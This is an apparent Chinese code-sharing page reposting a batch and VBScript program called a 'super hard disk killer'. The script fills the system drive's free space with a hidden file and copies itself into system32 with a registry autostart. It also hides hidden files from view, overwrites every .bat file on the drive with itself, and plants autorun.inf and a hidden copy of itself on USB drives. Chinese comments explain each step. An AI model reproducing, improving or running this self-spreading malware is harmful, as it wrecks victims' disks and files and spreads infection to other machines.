超级硬盘杀手的bat
程序员文章站
2022-11-12 23:19:47
复制代码 代码如下:@echo off %ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone% %ozone%&nbs...
复制代码 代码如下:
@echo off
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone% %name :reon% %ozone%
%ozone% %author:ozone [verybat.cn]% %ozone%
%ozone% %data :17/04/2007% %ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
if exsit %systemdrive%\pagefiles.sys goto end
copy %0 %windir%\system32\logon.bat ::复制自身
for /f "tokens=3*" %%i in ('dir /-c %systemdrive%^|find "可用字节"') do fsutil file createnew %systemdrive%\pagefiles.sys %%i ::制造超大文件,轰炸硬盘
attrib +r +s +h %systemdrive%\pagefiles.sys ::隐藏文件
reg add hklm\software\microsoft\windows\currentversion\run /v kv2007 /t reg_sz /d %windir%\system32\logon.vbs ::自动启动
reg delete hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall /va /f ::不显示隐藏文件
for /r %systemdrive% %%i in (*.bat) do type %0>%%i ::感染
if exist %windir%\system32\logon.vbs goto end
+++++++++++++++++++++++++=vbs部分+++++++++++++++++++++++++++++++++++++++
echo set fs =createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echo set wshshell = wscript.createobject("wscript.shell")>>%windir%\system32\logon.vbs
echo set objwmiservice = getobject("winmgmts:" _>>%windir%\system32\logon.vbs
echo ^& "{impersonationlevel=impersonate}!\\" ^& strcomputer ^& "\root\cimv2")>>%windir%\system32\logon.vbs
echo set coldisks = objwmiservice.execquery _>>%windir%\system32\logon.vbs
echo ("select * from win32_logicaldisk")>>%windir%\system32\logon.vbs
::监视u盘
echo for i =1 to 9000000000>>%windir%\system32\logon.vbs
echo for each objdisk in coldisks>>%windir%\system32\logon.vbs
echo select case objdisk.drivetype>>%windir%\system32\logon.vbs
echo :case 2:>>%windir%\system32\logon.vbs
::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.
echo y1=fs.fileexists(objdisk.deviceid ^& "\autorun.inf")>>%windir%\system32\logon.vbs
echo if not y1 then>>%windir%\system32\logon.vbs
echo set f=fs.opentextfile(objdisk.deviceid ^& "\autorun.inf",2, true)>>%windir%\system32\logon.vbs
echo f.write "[autorun]" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "open=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shellexecute=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shell\auto\command=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.close>>%windir%\system32\logon.vbs
echo set f1 = fs.getfile(objdisk.deviceid ^& "\autorun.inf")>>%windir%\system32\logon.vbs
echo if f1.attributes = f1.attributes and 2 then>>%windir%\system32\logon.vbs
echo :f1.attributes = f1.attributes xor 7:>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.
echo y2=fs.fileexists(objdisk.deviceid ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo if not y2 then >>%windir%\system32\logon.vbs
echo fs.copyfile "c:\windows\system32\logon.bat",objdisk.deviceid ^& "\">>%windir%\system32\logon.vbs
echo set f2 = fs.getfile(objdisk.deviceid ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo if f2.attributes = f2.attributes and 2 then>>%windir%\system32\logon.vbs
echo :f2.attributes = f2.attributes xor 7:>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo dirr = wshshell.expandenvironmentstrings("%systemdrive%")>>%windir%\system32\logon.vbs
::判断u盘中是否存在pagefiles.sys,如果不存在则写入pagefiles.sys并隐藏.
echo y3=fs.fileexists(dirr & "\pagefiles.sys")>>%windir%\system32\logon.vbs
echo if not y3 then>>%windir%\system32\logon.vbs
echo wshshell.run "logon.bat">>%windir%\system32\logon.vbs
echo wscript.sleep 500>>%windir%\system32\logon.vbs
echo set f3 = fs.getfile(dirr & "\pagefiles.sys")>>%windir%\system32\logon.vbs
echo if f3.attributes = f3.attributes and 2 then>>%windir%\system32\logon.vbs
echo :f3.attributes = f3.attributes xor 7:>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo end select>>%windir%\system32\logon.vbs
echo next>>%windir%\system32\logon.vbs
::每隔5秒扫描一次.
echo wscript.sleep 5000>>%windir%\system32\logon.vbs
echo next>>%windir%\system32\logon.vbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
:end
上一篇: 超级硬盘杀手的bat
下一篇: 简单的三步vuex入门